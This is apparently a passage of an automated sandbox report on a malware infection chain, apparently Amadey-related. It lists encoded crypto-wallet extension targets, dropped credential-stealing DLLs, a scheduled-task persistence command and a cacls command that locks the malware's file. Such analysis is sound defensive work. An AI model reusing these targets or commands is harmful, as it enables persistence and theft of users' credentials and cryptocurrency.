                                Source: 29.0.anon.exe.7d0000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                                Source: 31.2.nbveek.exe.400000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                                Source: 40.0.AAE1.exe.da0000.0.unpack, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                                Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\73df0e5f31911d52b5a1b6db393439f0
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4772:120:WilError_01
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeMutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_01
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3644:120:WilError_01
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_01
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: Ej3vSx3p8Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: ^aC:\lodoxage\jozur-36\fet\gojo51\kecogojujo\vimevudujaf.pdb source: 7E5F.exe, 00000019.00000000.489319093.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe, 00000019.00000002.827915874.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe.3.dr
                                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 6267.exe, 0000000D.00000002.485553488.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, 6267.exe, 0000000D.00000000.474252459.00000000001EE000.00000002.00000001.01000000.00000007.sdmp, 6267.exe, 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmp, 65C3.exe, 0000000E.00000000.476326948.000000000106E000.00000002.00000001.01000000.00000008.sdmp, 65C3.exe, 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmp, nbveek.exe, 0000000F.00000000.483640379.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 00000011.00000000.486060263.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 00000011.00000002.487757007.000000000119E000.00000002.00000001.01000000.00000009.sdmp, Legno.exe, 0000001C.00000002.535666056.0000000000FDE000.00000002.00000001.01000000.0000000F.sdmp, Legno.exe, 0000001C.00000000.494985153.0000000000FDE000.00000002.00000001.01000000.0000000F.sdmp, 8C99.exe, 0000001E.00000000.497110879.00000000000E0000.00000002.00000001.01000000.00000011.sdmp, 8C99.exe, 0000001E.00000002.523400669.00000000000E0000.00000002.00000001.01000000.00000011.sdmp, nbveek.exe, 0000001F.00000002.576827250.000000000119E000.00000002.00000001.01000000.00000009.sdmp, 8FF5.exe, 00000020.00000000.500023246.0000000000320000.00000002.00000001.01000000.00000014.sdmp, 8FF5.exe, 00000020.00000002.523719840.0000000000320000.00000002.00000001.01000000.00000014.sdmp, nbveek.exe, 00000025.00000002.523902619.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000025.00000000.514227237.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000026.00000000.514191687.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000026.00000002.839290985.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000027.00000002.842263496.0000000000E0E000.00000002.00000001.01000000.00000017.sdmp, nbveek.exe, 00000027.00000000.523581045.0000000000E0E000.00000002.00000001.01000000.00000017.sdmp, CEE7.exe, 0000002B.00000002.689486378.0000000004938000.00000004.00000800.00020000.00000000.sdmp, nbveek.exe.28.dr
                                Source: Binary string: C:\lodoxage\jozur-36\fet\gojo51\kecogojujo\vimevudujaf.pdb source: 7E5F.exe, 00000019.00000000.489319093.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe, 00000019.00000002.827915874.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe.3.dr
                                Source: Binary string: C:\cadof muk.pdb source: Ej3vSx3p8Y.exe
                                Source: Binary string: C:\ruko\kusugu8-fu.pdb source: 3320.exe.3.dr
                                Source: Binary string: >h6C:\ruko\kusugu8-fu.pdb source: 3320.exe.3.dr
                                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: 6C:\cadof muk.pdb source: Ej3vSx3p8Y.exe
                                Source: Binary string: UC:\kava72\hijirurelef\wayokowagohem1 cusewasuyu.pdb source: 79AB.exe, 00000014.00000000.487672492.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: BC:\sibuzugegipu47 vicu.pdb source: 6D94.exe, 00000010.00000000.483776925.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe, 00000010.00000002.819390818.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe.3.dr
                                Source: Binary string: C:\kava72\hijirurelef\wayokowagohem1 cusewasuyu.pdb source: 79AB.exe, 00000014.00000000.487672492.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: C:\sibuzugegipu47 vicu.pdb source: 6D94.exe, 00000010.00000000.483776925.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe, 00000010.00000002.819390818.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe.3.dr

                                Data Obfuscation

                                barindex
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeUnpacked PE file: 0.2.Ej3vSx3p8Y.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeUnpacked PE file: 20.2.79AB.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00409D85 push ecx; ret 0_2_00409D98
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001CF7E8 push E8FFFFFBh; iretd 13_2_001CF7ED
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001CE8C4 push esi; retf 13_2_001CE8C5
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D79D6 push ecx; ret 13_2_001D79E9
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_010579D6 push ecx; ret 14_2_010579E9
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0104E8C4 push esi; retf 14_2_0104E8C5
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0104F7E8 push E8FFFFFBh; iretd 14_2_0104F7ED
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_011879D6 push ecx; ret 15_2_011879E9
                                Source: anon[1].exe.15.drStatic PE information: 0xCA425CB3 [Mon Jul 12 20:18:59 2077 UTC]
                                Source: cred64[1].dll.39.drStatic PE information: section name: _RDATA
                                Source: cred64.dll.39.drStatic PE information: section name: _RDATA
                                Source: llpb1135.exe.40.drStatic PE information: section name: _RDATA
                                Source: llpb1135.exe.40.drStatic PE information: section name: .vmp0
                                Source: llpb1135.exe.40.drStatic PE information: section name: .vmp1
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1

                                Persistence and Installation Behavior

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 00000026.00000002.843894856.000000000098A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.847247347.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.846974076.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.719800807.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000027.00000002.837962620.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.720284634.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: nbveek.exe PID: 5324, type: MEMORYSTR
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vhifwjuJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fgifwjuJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\65C3.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fgifwjuJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeFile created: C:\Users\user\AppData\Local\Temp\llpb1135.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dllJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8C99.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\79AB.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CEE7.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeFile created: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4477.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AAE1.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeFile created: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7E5F.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeFile created: C:\Users\user\AppData\Local\Temp\Amadey.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3320.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vhifwjuJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6D94.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8FF5.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeFile created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeFile created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6267.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeFile created: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ej3vsx3p8y.exeJump to behavior
                                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fgifwju:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vhifwju:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:N"
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
